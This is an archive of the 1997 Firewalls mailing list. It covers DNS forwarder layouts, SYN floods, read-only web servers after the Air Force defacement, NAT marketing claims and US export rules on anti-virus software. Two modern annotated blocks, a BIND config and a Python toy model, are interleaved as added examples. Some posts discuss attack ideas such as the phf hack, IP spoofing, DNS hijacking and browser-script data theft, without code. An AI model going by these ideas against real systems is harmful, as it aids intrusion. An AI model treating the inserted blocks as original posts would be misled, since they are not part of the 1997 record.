1803 Research Blvd
Rockville, MD 20850
(301)838-8900 x 224

From firewalls-owner Thu Jan 2 14:09:40 1997
Date: Thu, 02 Jan 1997 16:21:44 -0800
From: Adam Safier
Reply-To: asafier@csc.com
Organization: Computer Sciences Corp.
To: Firewalls@GreatCircle.COM
Subject: Re: DNS Proxy and Internal Root Name Server

I'm missing something in this DNS discussion. Don't make the internal "root" a root; make it your "main" DNS server with a limited cache file.

You set the "main" internal DNS server to act as a recursive resolver for all internal DNS servers. Point it only to the external DNS server, which can also act as a recursive resolver. All internal DNS servers point to the internal "main" server only, using forwarder/slave lines. External queries are recursively resolved by your "main" DNS server, which can pass through the firewall and has forwarder/slave lines pointing to the external DNS server. The answers are received by the external server, forwarded to the "main" server and then forwarded to internal slave DNS servers or actual workstations. There is no need for the other internal DNS servers to see your proxy or external DNS server.

  Internet---DNS external recursive resolver----FW----DNS main recursive resolver
                                                                    |
                                             Other DNS servers only point to DNS main
                                             and use recursive queries.

(P31, 143 in O'Reilly)

Adam

JF wrote:
> Date: Thu, 02 Jan 1997 09:03:03 +0100
> From: Jean-Francois ZWOBADA
> Subject: Re: DNS Proxy and Internal Root Name Server
>
> At 16:59 31/12/1996 -0500, R. McMahon wrote:
> > Background:
> > I am looking at setting up a DNS proxy using "forwarders" and "slave"
> > lines in my /etc/named.boot file as described in the "Building
> > Firewalls" and "DNS and BIND" books by O'Reilly. However, I want to do
> > this where I can maintain an internal Root name server. For resolution
> > of domain names outside the internal top-level domains, I would like the
> > proxy name server (which will have an "external" domain name) to be the
> > only name server queried by the internal root name server, and to have
> > this proxy be the only host to query external name servers. (I would
> > set up UDP port 53 filtering on the router.)
> >
> > Problem:
> > One problem I thought of concerns the mitigation between the internal
> > root name server and the forwarders/slave lines. If a subordinate
> > domain name server queries the root name server for an "outside" domain,
> > how would it know to forward the query to the proxy (being that it is an
> > internal root name server)? I could have my subordinate top-level
> > domain name servers query the proxy directly by putting a forwarders line
> > in its /etc/named.boot; however, this would bypass the internal root
> > structure. It seems to be straightforward w/o an internal root name
> > server; however, I need to maintain these root name servers. Can anyone
> > help?
> >
> > Thanks,
> >
> > rwm
>
> The problem with an internal root server is that it won't take any account
> of your forwarders & slave options because it is said to be a root server.
> The only solution I think of is adding the noforward patch in the named
> daemons of the first level name servers you have under your root server.
> You just have to specify all the domains known by your internal root
> nameserver so that your lower level nameserver would query it but would
> forward to your proxy for everything else.
>
> Hope this helps
>
> Jean-Francois
>
> PS: the noforward patch is available for BIND on ftp.vix.com (but I can't
> remember the path...)

--
Adam Safier             asafier@csc.com         http://www.csc.com
CSC-SED-Infosec         (301) 794-1349          (301) 552-3272 (fax)
Technology Abuse: 1) Netscape Frames on a 14" screen.
                  2) Netscape 3.0 on a 386-33 w/ 8 Meg RAM.
The above are my own opinions. I'm proud to live in a country where I'm free to express them!
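The three-tier layout Adam describes (external recursive resolver, internal "main" server, lower-level internal servers chained with forwarders/slave lines), written out as an added example in BIND 4 named.boot syntax; this is not configuration from any post in the thread, and the zone names example.corp / sales.example.corp and the addresses 192.0.2.53, 192.168.0.2 and 192.168.1.2 are constructed placeholders.

```text
; ---- named.boot on the EXTERNAL recursive resolver (192.0.2.53, outside the FW) ----
; An ordinary Internet resolver: real root hints, no internal zone data at all.
directory   /etc/namedb
cache       .                         db.cache        ; Internet root servers
primary     0.0.127.in-addr.arpa      db.127.0.0

; ---- named.boot on the internal MAIN server (192.168.0.2, inside the FW) ----
; Primary or secondary for EVERY internal zone: in slave mode named answers
; only from the zones it holds and hands everything else to the forwarders,
; so it will never follow a delegation to another internal server.
; The firewall only has to pass port 53 between 192.168.0.2 and 192.0.2.53.
directory   /etc/namedb
primary     example.corp              db.example.corp
primary     0.168.192.in-addr.arpa    db.192.168.0
secondary   sales.example.corp        192.168.1.2   bak.sales.example.corp
cache       .                         db.cache        ; "limited" hints: loaded at
                                                      ; start-up, never contacted
forwarders  192.0.2.53                                ; the external resolver only
slave                                                 ; forward-only (BIND 4.9
                                                      ; spelling: options forward-only)

; ---- named.boot on a lower-level internal server (192.168.1.2) ----
; Holds its own zone and sends everything else to MAIN; it never sees the
; firewall, the external resolver, or the Internet roots.
directory   /etc/namedb
primary     sales.example.corp        db.sales.example.corp
primary     1.168.192.in-addr.arpa    db.192.168.1
cache       .                         db.cache
forwarders  192.168.0.2                               ; the internal MAIN server only
slave

; Resulting path for a workstation in sales.example.corp asking for www.example.com:
;   workstation -> 192.168.1.2 (not authoritative, forwards)
;               -> 192.168.0.2 (not authoritative, forwards through the FW)
;               -> 192.0.2.53  (resolves recursively from the Internet roots)
;   and the answer is relayed back along the same chain.
; A query for a host in example.corp stops at 192.168.0.2, which is authoritative.
```

Because MAIN is authoritative for all internal zones, no internal root server and no noforward patch are needed: the "forwarders overrides everything" problem Jean-Francois hit only arises when a server must choose between a root and a forwarder for the same query.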
From firewalls-owner Thu Jan 2 14:20:16 1997
From: "Martin C. Walker"
To: firewalls@greatcircle.com
Subject: syndefender (fw-1)
Date: Thu, 02 Jan 1997 16:31:36 -0500

Hi all,

Trying to determine if FW-1 itself (Solaris x86) is susceptible to the TCP SYN denial of service attack, and if so, whether deploying their SYNDefender product (either gateway or relay) will help. Does anyone have any ideas regarding this?

Since I don't allow any inbound connections to my machines other than the FW-1 (DNS/SMTP), I don't think anything else is at risk.

--------------------------------------------------------------------------
Martin C. Walker       | martinw@epcorp.com  | PP-ASEL,IFR AA5-A 9908U
Project Lead           | (513)629-2517       | Blue Belt Okinawan Shuri-Ryu
Eagle-Picher Inc.      | Fax: (513)629-2449  | Porsche 911SC
580 Walnut St,         |                     |
Cincinnati, OH 45202   |                     |

From firewalls-owner Thu Jan 2 14:59:28 1997
From: "Mike 'Will tame Cisco's for food' Malik"
To: FaNgYoU2
Cc: firewalls@GreatCircle.COM
Subject: Re: Lightweight Directory Access Protocol
Date: Thu, 02 Jan 1997 17:13:36 -0500

At 07:41 PM 12/31/96 -0500, FaNgYoU2 wrote:
> Lightweight Directory Access Protocol (LDAP) is designed to be a low cost
> and low overhead way of accessing enterprise names directories that are
> based on X.500. A number of major LAN operating systems vendors have made
> statements that they will develop modules for their operating systems that
> will interact with LDAP enterprise names directories. My limited amount
> of web surfing showed that some development is being done in Unix to
> access LDAP as well as the traditional DNS.
> [SNIP]
> Any of you hot shot vendors or Chief Scientists or consultants that
> left firewall vendors for other companies doing any work to include
> LDAP enterprise directory access in firewalls?

You know, I'm not sure I want all this flexibility going through my firewall. I'm sure someone might; I think this protocol might give all those "hot shot vendors and Chief Scientists" headaches for years to come. Of course this is just my take on the matter.

Mike

Multi-platform is 2 or more Microsoft OS's in a group

From firewalls-owner Thu Jan 2 15:59:37 1997
From: cwg@DeepEddy.Com
To: mcnabb@argus.cu-online.com (Paul McNabb)
Cc: Firewalls@GreatCircle.COM, cwg@DeepEddy.Com
Subject: Re: Read-only Web Site (was AF hack)
In-Reply-To: Your message of "Thu, 02 Jan 1997 12:41:29 CST." <199701021841.MAA21415@argus.cu-online.com>
Date: Thu, 02 Jan 1997 17:46:52 -0600

> The web server has two network connections, but has IP forwarding
> disabled. Processes coming in from one network see all file systems
> as read-only (making /tmp RO is an option), and there is no mechanism
> for bypassing that, even if the process is root. All device special
> files are completely inaccessible to all processes and all users -- also
> mknod(2) is disabled. If a user comes in from the other network,
> he/she can access the system normally, except that UID 0 (root) is
> treated as a normal account in terms of OS privilege, so attacks from
> this direction are also more tightly controlled (special programs
> are provided to manage the system instead of using a special account
> such as root).
>
>                       +------------+
>   <-------------->    |  Secured   |    <-------------->
>   internal network    |  Web Site  |    Internet/PublicNet
>   (RW file systems)   +------------+    (RO file systems)
>
> When a Solaris host (x86 or SPARC) has been updated with this level
> of security, you can still use the r* commands, telnet, ftp, and
> even NFS from either side. You can have the RO restriction be done
> on a per-file basis as well, so you can be creative about your setup.

How do you do this?
Chris

--
Chris Garrigues                    O-            cwg@DeepEddy.Com
Deep Eddy Internet Consulting                    +1 512 432 4046
609 Deep Eddy Avenue
Austin, TX 78703-4513              http://www.DeepEddy.Com/~cwg/

From firewalls-owner Thu Jan 2 16:37:40 1997
From: Sebastian Stache
To: "'Firewalls (inet/GreatCircle)'"
Cc: "'long-morrow@CS.YALE.EDU'", "'mjo@dojo.mi.org'"
Subject: RE: Air Force Web Site Hacked
Date: Fri, 3 Jan 1997 00:53:10 +0100

Morrow wrote:
> You'd be surprised at how many NCSA httpd sites are
> still out there which are vulnerable to the attack:

You're right, I'm amazed. I've seen variations on the phf theme everywhere (including this list), so I would have thought a military organisation would know better. And how many on this list do not know of bouncing mails in early versions of sendmail, or of NFS weaknesses (referring to Michael J. O'Conner's reply)?

In a way it's comforting to hear that these sites are accessible to anyone capable of reading COAST, or any other primer on security - it definitely must mean that the cold war is really over.

Regards,
Sebastian Stache

From firewalls-owner Thu Jan 2 17:00:49 1997
From: Steve Matkoski
Reply-To: makoski@future.dreamscape.com
Organization: http://www.dreamscape.com/matkoski/netcon/
To: Firewalls@GreatCircle.COM
Subject: Re: Untrusted vs. trusted network security
Date: Thu, 02 Jan 1997 19:16:25 -0500

Paul Ferguson wrote:
> Ditto. PASV FTP works fine, lasts a long time. Even has growing
> client support. :-)

Where can I find info on PASV mode?

--
Thanks!
-steve.
matkoski@dreamscape.com From firewalls-owner Thu Jan 2 17:13:06 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id QAA22333 for firewalls-outgoing; Thu, 2 Jan 1997 16:35:19 -0800 (PST) Received: from hidata.com (hidata.com [205.158.61.34]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id QAA22326 for ; Thu, 2 Jan 1997 16:35:11 -0800 (PST) Received: by hidata.com; id AA11043; Thu, 2 Jan 97 16:34:46 PST Received: from oscntsrv.hidata.com(205.158.60.100) by hds-gw.hidata.com via smap (3.2) id xma011039; Thu, 2 Jan 97 16:34:42 -0800 Received: by oscntsrv.hidata.com with SMTP (Microsoft Exchange Server Internet Mail Connector Version 4.0.994.63) id <01BBF8CB.CD6DDF40@oscntsrv.hidata.com>; Thu, 2 Jan 1997 16:41:29 -0800 Message-Id: From: "Stout, Bill" To: "'Firewall List'" Subject: RE: Read-only Web Site (was AF hack) Date: Thu, 2 Jan 1997 16:41:27 -0800 X-Mailer: Microsoft Exchange Server Internet Mail Connector Version 4.0.994.63 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk At first glance that appears to be an easily hacked site. Maybe with deep thought one can imagine security working for a while... On second glance, security on that configuration still appears hackable. That said, most of what goes on in this list is what I called in my L.A. Street racing days as 'bench racing' ("yea, I added a chrome shift knob and got five more horsepower"). When the pink slips come out, you know there's some serious hardware inside, but until then, it's mostly theoretical talk about what works and what doesn't until you get a F-WOS (Fed.-Web Oh Sh_t). The following contains bench racing. ;) It is not easy to lock all of the incoming services from a specific port. 
Disabling IP forwarding is a start, but if a system gateways to other systems inside, or to itself without a strong authentication mechanism, it is still vulnerable. You also need code smart enough to recognize trusted addresses coming in from the wrong port. Maybe your 7500 has a weak point, a vty password that actually is a word. The Cisco is close enough to successfully spoof trusted ip addresses.

Let's say someone on your internal network xxx.185.2.0(?) opened a HTTP connection out to a site. Wouldn't an Active-X/Java/Javascript application - 'some script' be able to write to/collect data on a NFS-mounted drive which happens to be your webserver? A script could run commands to view network connections on an internal DOS or UNIX client, send the data back as cookies, process that data (grep for '/docs', or '/ns-home', or '/wwwroot') then have the browser background cache a new index.html document to that location. Maybe that new Trek screensaver from usenet does the same thing, or runs a '90s' version of 'Jive' on your index.html/default.htm page. An outside programmer could see some instant gratification from your home page.

Point is, I think your configuration needs more protection.

Bill Stout

On Thursday, January 02, 1997 10:41 AM, mcnabb@argus.cu-online.com wrote:
> The web server has two network connections, but has IP forwarding
> disabled. Processes coming in from one network see all file systems
> as read-only (making /tmp RO is an option), and there is no mechanism
> for bypassing that, even if the process is root. All device special
> files are completely inaccessible to all processes and all users -- also
> mknod(2) is disabled.
> If a user comes in from the other network,
> he/she can access the system normally, except that UID 0 (root) is
> treated as a normal account in terms of OS privilege, so attacks from
> this direction are also more tightly controlled (special programs
> are provided to manage the system instead of using a special account
> such as root).
>
>                         +------------+
>   <-------------->      |  Secured   |      <-------------->
>   internal network      |  Web Site  |      Internet/PublicNet
>   (RW file systems)     +------------+      (RO file systems)
>
> When a Solaris host (x86 or SPARC) has been updated with this level
> of security, you can still use the r* commands, telnet, ftp, and
> even NFS from either side. You can have the RO restriction be done
> on a per-file basis as well, so you can be creative about your setup.

From firewalls-owner Thu Jan 2 17:14:12 1997
From: Vin McLellan
Organization: The Privacy Guild
To: firewalls@greatcircle.com
Subject: The Looong Reach of US Crypto-Export Controls (?)
Date: Thu, 02 Jan 1997 19:51:25 -0500

Buried deep in the new Federal regs controlling crypto exports is a little gem of potential interest to this List.
Plucked from an extended discussion on the Cypherpunks List:

> >But it _specifically_ restricts virus-checkers (and, also, it would seem,
> >backup programs, but that could be stretching it):
> >
> >ECCN 5D002.c.3:
> >
> ># ``Software'' designed or modified to protect against malicious
> ># computer damage, e.g., viruses

Virus checkers, programs like Tripwire, and (some, many, or all?) US firewall products are reported to be export controlled under the new regs... and subject to sale-by-sale license and export approval. Regardless of whether the software program uses crypto or not. True?

Software products which use Java applets and ActiveX controls (if they also have anti-virus components, likely to be demanded by users, at least in Europe) would also apparently fall within the new reg's hyperactive scope.

Suerte,
_Vin

(PS: Any estimates of sales, market share, or jobs which will be sacrificed if such a provision is enforced? Could the possibility of it being enforced mute the industry's voice in public debate about a domestic GAK law in '97? Any volunteers to explain to Congressmen that many great programmers are born and bred outside US jurisdictions?)
From firewalls-owner Thu Jan 2 17:16:10 1997
From: Steve Matkoski
Reply-To: makoski@future.dreamscape.com
Organization: http://www.dreamscape.com/matkoski/netcon/
To: Firewalls@GreatCircle.COM
Subject: internal filtering router - filter config?
Date: Thu, 02 Jan 1997 19:44:22 -0500

What type of things would you filter on the internal router? Or even the external router? I am going to be installing a firewall real soon and would really appreciate any help.

-steve.
matkoski@dreamscape.com

From firewalls-owner Thu Jan 2 17:38:54 1997
From: "Stout, Bill"
To: "'firewalls@GreatCircle.COM'"
Subject: RE: Air Force Web Site Hacked -Reply
Date: Thu, 2 Jan 1997 16:46:40 -0800

Why not make a webserver serve properly PGP-tagged documents only? Or did someone already invent that one too?
Bill Stout

From firewalls-owner Thu Jan 2 17:54:07 1997
From: Russ
To: "'Jamie Thain'", firewalls@greatcircle.com
Cc: "'info@on.com'"
Subject: RE: NT NAT
Date: Thu, 2 Jan 1997 19:36:05 -0500

>There is now an NT NAT. http://www.on.com.

I hate to do this without looking at the product first, but here's an excerpt from their web page describing the features their IP Funnel product provides;

    .Protects your internal IP servers and workstations from Internet hackers

Now for a company that sells a Firewall, you'd have to wonder how much they understand security, wouldn't you? Never before have I ever seen anyone attempt to claim that NAT by itself makes your entire internal network secure from Internet hackers, but finally someone has actually done it. We don't need Firewalls any more folks, all we need is NAT. Too bad the NAT RFC doesn't mention that it was created to do away completely with Firewalls, we could have all saved ourselves a whole lot of effort and time.

Their network diagram describing how the system would be placed has it behind a router and in front of the internal LAN. So now someone would seem to think that it is highly desirable to dedicate an NT Workstation to the task of NAT-only. Me thinks you could probably get a new router that supports NAT for less money.
Maybe their marketing staff is made up of rejected Microsoft marketeers...???

Cheers,
Russ
R.C. Consulting, Inc. - NT/Internet Security Consulting

From firewalls-owner Thu Jan 2 18:21:37 1997
From: Paul Ferguson
To: makoski@future.dreamscape.com
Cc: Firewalls@GreatCircle.COM
Subject: Re: Untrusted vs. trusted network security
Date: Thu, 02 Jan 1997 21:00:24 -0500

See: RFC1579, 'Firewall-Friendly FTP', S. Bellovin, February 1994.

- paul

At 07:16 PM 1/2/97 -0500, Steve Matkoski wrote:
>Paul Ferguson wrote:
>
>> Ditto. PASV FTP works fine, lasts a long time. Even has growing
>> client support. :-)
>>
>Where can I find info on PASV mode?
>
>--
>
>Thanks!
>-steve.
>matkoski@dreamscape.com
>

--
Paul Ferguson                     ||        ||
Consulting Engineering            ||        ||
Herndon, Virginia USA            ||||      ||||
tel: +1.703.397.5938         ..:||||||:..:||||||:..
e-mail: pferguso@cisco.com   c i s c o S y s t e m s

From firewalls-owner Thu Jan 2 20:03:13 1997
From: Mark Joseph Edwards
To: "'Russ'"
Cc: "'firewalls@greatcircle.com'"
Subject: RE: NT NAT
Date: Thu, 2 Jan 1997 21:42:38 -0600

Ok - I visited this site, and read every single word about OnGuard. I don't see anything on this site AT ALL that insinuates that this product -- by itself -- is all the protection your network needs. Nothing. Zip. Nada. Zilch.

They do, however, quite clearly, stress over and over that this product is an IP address translator (NAT). There IS one teeny tiny short sentence that says "Protects your internal IP servers and workstations from Internet hackers" and that's it. This doesn't say "we're a cure all" or "we're all you need", and it doesn't violate any "Truth in Advertising" ethics either.
Russ wrote - "Never before have I ever seen anyone attempt to claim that NAT by itself makes your entire internal network secure from Internet hackers, but finally someone has actually done it."

WRONG RUSS -- WRONG WRONG WRONG. HEY, IT DOESN'T SAY THAT IT DOES! To say the least, your comments are UNFAIR.

And, your cheap stab at MS.....geeez man, what's come over you? This list doesn't need that type of post, ya know?

mje

-----Original Message-----
From: Russ [SMTP:Russ.Cooper@RC.on.ca]
Sent: Thursday, January 02, 1997 6:36 PM
To: 'Jamie Thain'; firewalls@greatcircle.com
Cc: 'info@on.com'
Subject: RE: NT NAT

>There is now an NT NAT. http://www.on.com.

I hate to do this without looking at the product first, but here's an excerpt from their web page describing the features their IP Funnel product provides;

    .Protects your internal IP servers and workstations from Internet hackers

Now for a company that sells a Firewall, you'd have to wonder how much they understand security, wouldn't you? Never before have I ever seen anyone attempt to claim that NAT by itself makes your entire internal network secure from Internet hackers, but finally someone has actually done it. We don't need Firewalls any more folks, all we need is NAT. Too bad the NAT RFC doesn't mention that it was created to do away completely with Firewalls, we could have all saved ourselves a whole lot of effort and time.

Their network diagram describing how the system would be placed has it behind a router and in front of the internal LAN. So now someone would seem to think that it is highly desirable to dedicate an NT Workstation to the task of NAT-only. Me thinks you could probably get a new router that supports NAT for less money.

Maybe their marketing staff is made up of rejected Microsoft marketeers...???

Cheers,
Russ
R.C. Consulting, Inc.
- NT/Internet Security Consulting

From firewalls-owner Thu Jan 2 20:14:07 1997
From: "Tijani CHAOUCH BOURAOUI"
To: Firewalls@GreatCircle.COM
Subject: RE: Firewalls-Digest V5 #699
Date: Fri, 3 Jan 97 06:38:54 UT

----------
From: firewalls-digest-owner@GreatCircle.COM on behalf of Firewalls-Digest
Sent: Thursday, January 02, 1997 1:00 AM
To: firewalls-digest@GreatCircle.COM
Subject: Firewalls-Digest V5 #699

Firewalls-Digest        Thursday, January 2 1997        Volume 05 : Number 699

In this issue:

    Re: Christopher Klaus and ISS
    RE: Air Force Web Site Hacked
    Re: DNS Proxy and Internal Root Name Server

See the end of the digest for information on subscribing to the Firewalls or Firewalls-Digest mailing lists and on how to retrieve back issues.

----------------------------------------------------------------------

Date: Wed, 1 Jan 1997 19:06:25 -0500 (EST)
From: Todd Graham Lewis
Subject: Re: Christopher Klaus and ISS

On Tue, 31 Dec 1996, Robert Hanson wrote:

> no disrespect intended to you Todd, yet....
>
> kill! maime! shoot! my goodness... we are all capitalist pigs... what
> makes anyone better than anyone else standing next to them...

I not only like corporations, I work for one.
Believe it or not, I don't even have a problem with vendors discussing their products on the list. Those who offer help to newbies, contribute to technical discussions, etc., are more than entitled to mention once in a while "BTW (disclaimer: I work for 'em), our product X is designed to address this problem", or even to say "In light of the discussion last month, I thought that the list might be interested in our new product, SuperBlammo4000."

What I don't appreciate are bone-headed sales pitches coming from people who never participate in the discussions on the list, and whose sole purpose is to use the list as a free advertising channel. I don't think that this is too far off the mark, and the fact that Klaus is a complete asshole just makes the decision that much easier.

(BTW, I'm sorry I wasn't able to participate in the discussion about Linux firewalls. I was visiting family during the holidays.)

__
Todd Graham Lewis                                       Linux!
Core Engineering                                Mindspring Enterprises
tlewis@mindspring.com                           (800) 719 4664, x2804

------------------------------

Date: Thu, 2 Jan 1997 13:50:18 +0900
From: "Jason T. Luttgens"
Subject: RE: Air Force Web Site Hacked

Why not get Practical Unix and Internet Security from O'Reilly and do what it says. I bet if everyone disabled stupid services (on unix hosts), installed TCP wrappers to allow telnets from limited IP addresses, did Cisco's recommendations on preventing IP spoofing, used Linux or another free x86 Unix and ssh to telnet in, and subscribed to security mailing lists to keep up on things, these incidents would slow down a LOT...how many people out there have done this to their unix host?? Get to work you system admins! All this is your fault......
----------
From: Norm Laudermilch[SMTP:norm@UU.NET]
Sent: Wednesday, January 01, 1997 8:57 AM
To: firewalls@greatcircle.com
Subject: Re: Air Force Web Site Hacked

[from Michael Idengren:]
> I don't know about the rest of you but I agree with the idea of putting a
> webserver on a CD-ROM.

[from Thomas Leitner:]
> why not just put it on a separate disk which is mounted
> read-only?

[from Dale Drew:]
> Using a CDROM web-server doesn't provide resistance to an
> attacker who gains access to the system as ROOT...

Keep in mind that this entire thread assumes that the attacker will *not* take an easier approach, such as compromising the DNS records that point to the server. In this case, the attacker can create any web content they like, spend all the time in the world creating it, and then quickly convince the DNS servers that www.foo.com now resolves to the new (fake) address. Securing your www server is just a first (although important) step.

I do think read-only media is an interesting idea, by the way :) Dale is right though, there are still vulnerabilities. Personally, I like the idea of marking the files immutable myself. This way, even root can't change the content unless the machine is brought down into single-user mode. Not sure how many other operating systems support this other than (the great) BSDI though.

Happy new year (2 minutes to go...),

Norm

----------------------------------------------------------------------
Have you cleaned your packet filter lately?  - Josh Osborne
----------------------------------------------------------------------
Norm Laudermilch                        E-mail: norm@uu.net
Manager, Information Security           Phone:  703-206-5952
UUNET Technologies, Inc.
3060 Williams Drive
Fairfax, VA 22031-4648
----------------------------------------------------------------------

------------------------------

Date: Thu, 02 Jan 1997 09:03:03 +0100
From: Jean-Francois ZWOBADA
Subject: Re: DNS Proxy and Internal Root Name Server

At 16:59 31/12/1996 -0500, R.
McMahon wrote:
>Background:
>I am looking at setting up a DNS proxy using "forwarders" and "slave"
>lines in my /etc/named.boot file as described in the "Building
>Firewalls" and "DNS and BIND" books by O'Reilly. However, I want to do
>this where I can maintain an internal Root name server. For resolution
>of domain names outside the internal top-level domains, I would like the
>proxy name server (which will have an "external" domain name) be the
>only name server queried by the internal root name server and having
>this proxy be the only host to query external name servers. (I would
>set up UDP port 53 filtering on the router.)
>
>Problem:
>One problem I thought of concerns the mitigation between the internal
>root name server and the forwarders/slave lines. If a subordinate
>domain name server queries the root name server for an "outside" domain,
>how would it know to forward the query to the proxy (being that it is an
>internal root name server)? I could have my subordinate top-level
>domain name servers query the proxy directly by putting a forwarders line
>in its /etc/named.boot, however, this would bypass the internal root
>structure. It seems to be straightforward w/o an internal root name
>server, however, I need to maintain these root name servers. Can anyone
>help.
>
>Thanks,
>
>rwm
>

The problem with an internal root server is that it won't take any account of your forwarders & slave options because it is said to be a root server. The only solution I think of is adding the noforward patch in the named daemons of the first level name servers you have under your root server. You just have to specify all the domains known by your internal root nameserver so that your lower level nameserver would query it but would forward to your proxy for everything else.

Hope this helps

Jean-Francois

PS: the noforward patch is available for BIND on ftp.vix.com (but I can't remember the path...)
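A toy model of the split described above, added here as an illustration and not code from the original post or from BIND: an internal root that knows only the constructed internal top-level domains "corp" and "lab", a proxy that is the only host allowed out on UDP/53, and a first-level server with and without a noforward-style list of internally known domains. Server names, the domain list and the router rule are all constructed for the example.

```python
"""Model of an internal root server, a DNS proxy and a first-level server.

Constructed toy resolvers, not BIND code.  They show why a first-level
server that simply asks the internal root gets NXDOMAIN for outside
names, and how a noforward-style domain list restores the split:
internal names go to the root, everything else to the proxy.
"""

INTERNAL_TLDS = ("corp", "lab")        # constructed internal top-level domains
PROXY_HOST = "dnsproxy.corp"           # constructed: the bastion resolver


def internal_root(qname):
    """Internal root: authoritative for '.', it knows only INTERNAL_TLDS."""
    labels = qname.rstrip(".").rsplit(".", 1)
    tld = labels[-1]
    if tld in INTERNAL_TLDS:
        return ("REFER", f"ns.{tld}")  # referral to the internal TLD server
    return ("NXDOMAIN", None)          # the root believes no such TLD exists


def proxy(qname):
    """Proxy name server: the only host that may query external servers."""
    return ("ANSWER", f"external:{qname}")


def first_level_server(qname, noforward_domains=None):
    """First-level server beneath the internal root.

    With noforward_domains=None it behaves like a stock named that has
    been given a root: it asks the root for everything, and forwarders
    are never consulted.  With a list of internally known domains it
    asks the root only for names under those domains and forwards all
    other names to the proxy (the noforward-patch behaviour).
    """
    if noforward_domains is not None:
        name = qname.rstrip(".")
        internal = any(name == d or name.endswith("." + d)
                       for d in noforward_domains)
        if not internal:
            return proxy(qname)
    return internal_root(qname)


def router_allows_dns(src_host, dst_port, proto="udp"):
    """Router filter from the quoted question: only the proxy talks out on 53."""
    if proto == "udp" and dst_port == 53:
        return src_host == PROXY_HOST
    return True  # other traffic is outside the scope of this rule


if __name__ == "__main__":
    for q in ("mail.corp", "www.example.com"):
        print(q, "plain:", first_level_server(q),
              "noforward:", first_level_server(q, list(INTERNAL_TLDS)))
```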
------------------------------

End of Firewalls-Digest V5 #699
*******************************

To unsubscribe from Firewalls-Digest, send the following command in the body of a message to "Majordomo@GreatCircle.COM":

    unsubscribe firewalls-digest

If you want to subscribe or unsubscribe an address other than the account the mail is coming from, such as a local redistribution list, then append that address to the command; for example, to subscribe "local-firewalls":

    subscribe firewalls-digest local-firewalls@your.domain.net

A non-digest (direct mail) version of this list is also available; to subscribe to that instead, replace all instances of "firewalls-digest" in the commands above with "firewalls".

Compressed back issues are available for anonymous FTP from FTP.GreatCircle.COM, in pub/firewalls/digest/vNN.nMMM.Z (where "NN" is the volume number, and "MMM" is the issue number).

From firewalls-owner Thu Jan 2 20:44:19 1997
From: Dave Pifke
To: firewalls@greatcircle.com
Subject: http://www.victim.com
Date: Thu, 2 Jan 1997 21:30:52 -0800 (PST)

For all of you out there who cut and pasted the URL for the 'phf' hack, expect a nastygram in your postmaster's mailbox.
I have a trojan /cgi-bin/phf program that automatically sends mail to root, postmaster, and abuse at your domain before returning a false 404 message. Somebody brought to my attention that a message went out over this list showing "victim.com" as an example site. It goes to show that you shouldn't believe everything you read. ;-)

Reply to me directly, as I don't subscribe to this list. Ask nicely and I'll send you the source (in Perl).

--
Dave Pifke, root@victim.com
System Administrator/Network Grease Monkey
Information Victim Technologies

From firewalls-owner Thu Jan 2 21:33:55 1997
From: lawrenceting@www.uob.com.sg (Lawrence Ting)
To: firewalls@greatcircle.com
Subject: Any Recommendations?
Date: Fri, 3 Jan 1997 13:29:59 +0800

Good day,

I'm in the midst of evaluating BlackHole, Gauntlet and Firewall-1 as a proxy-based firewall, while evaluating Sunscreen, CISCO PIX and Proteon GTX Secure as an IP-less packet-filtering firewall. Firewall-1 seemed more like a packet-filtering firewall while I have a hard time distinguishing a better choice between Blackhole and Gauntlet. As for Sunscreen, it is a definitely more expensive choice than the other two.
Can someone pls do kindly share your expertise or comments or experience on the abv mentioned products in terms of their functionalities?

Thanks in adv.

Lawrence TING
Network Security Officer

From firewalls-owner Fri Jan 3 00:30:09 1997
From: Vin McLellan
To: firewalls@greatcircle.com
Subject: The Looong Reach of US Crypto-Export Controls
Date: Fri, 3 Jan 1997 03:22:17 -0500

I earlier posted a message which quoted a well-informed Netizen who claimed that the new US Federal ERA regs (which transfer control of many encryption exports from the U.S. Dept. of State to the U.S. Commerce Dept) now explicitly forbid the unlicensed export of software "designed or modified to protect against malicious computer damage, e.g., viruses" (c.3., below).

Tell the truth, I couldn't quite believe they had done it! (A whole new _class_ of export controls? Over very basic computer security tech, so vaguely described? Tucked into the fine print of a regulatory rewrite which the Administration has widely touted as a "compromise" with market-hungry US Industry and concerned compsec professionals!?!
And with the DC rumor mill full of claims that the heavy-handed ERA language reflected the FBI's ambitions for a domestic GAK bill, not the NSA/DoD's spooky Infowar concerns.)

Also, the fact that I had posted a citation of such import without having dug up the original doc myself bothered me. So, in the wee hours, I arose from my snug bed, kicked the sleeping PC awake, and burrowed into the Federal Register... hunting (as it turned out) for Supplement No. 2 to Part 774 of the ERA: "General Technology and Software Notes."

(Please note that American citizens and U.S. firms and organizations have but _ten_ days left, see below, to submit their comments on this "Interim Final Rule" -- which already has the force of Law -- to Commerce and their Congressfolk. E-mail, phone, and fax numbers for US Senators and Congressmen are at:

You might prefer to write a brief note for the US Mail; less than half the members of the US Congress have e-mail addresses. Which perhaps explains a little about how this silliness could happen;-)

Here's the source code, so to speak:

List of Items Controlled

Unit: $ value
Related Controls: NA
Related Definitions: N/A
Items:

a. ``software'' specially designed or modified for the ``development'', ``production'' or ``use'' of equipment or ``software'' controlled by 5A002, 5B002 or 5D002.

b. ``Software'' specially designed or modified to support ``technology'' controlled by 5E002.

c. Specific ``software'' as follows:

c.1. ``Software'' having the characteristics, or performing or simulating the functions of the equipment controlled by 5A002 or 5B002;

Note: 5D002.c.1 includes controls key escrow encryption software transferred from the U.S. Munitions List following a case-by-case determination by the Department of State through the commodity jurisdiction procedure. See Sec. 742.15 of the EAR.

c.2. ``Software'' to certify ``software'' controlled by 5D002.c.1;

c.3.
``Software'' designed or modified to protect against malicious computer damage, e.g., viruses;

Note: 5D002 does not control:

a. ``Software'' required for the ``use'' of equipment excluded from control under the Note to 5A002.

b. ``Software'' providing any of the functions of equipment excluded from control under the Note to 5A002.

__Below: Info Header of the Document as Published__

[Federal Register: December 13, 1996 (Volume 61, Number 241)]
[Rules and Regulations]
[Page 65642-65467]
From the Federal Register Online via GPO Access [wais.access.gpo.gov]

=======================================================================
-----------------------------------------------------------------------

DEPARTMENT OF COMMERCE
Bureau of Export Administration

15 CFR Parts 734, 740, 742, 762 and 774

